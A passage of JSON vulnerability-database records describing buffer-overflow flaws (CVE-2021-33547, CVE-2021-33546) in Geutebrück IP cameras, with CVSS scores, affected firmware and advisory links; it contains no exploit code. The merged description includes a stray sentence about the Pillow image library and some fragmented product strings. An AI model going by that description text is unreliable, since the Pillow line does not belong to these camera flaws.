      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33547",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33547",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33547",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33547",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33547",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2090",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33547",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33547",
            "trust": 2.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "id": "VAR-202109-0600",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T20:36:43.383000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158070"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33547"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/121.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "date": "2021-09-13T18:15:22.420000",
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33547"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          },
          {
            "date": "2021-09-27T14:30:58.053000",
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2090"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0599

    Vulnerability from variot - Updated: 2025-01-30 19:58

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0599",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33546"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33546",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33546",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33546",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33546",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33546",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2091",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33546",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2091"
          },
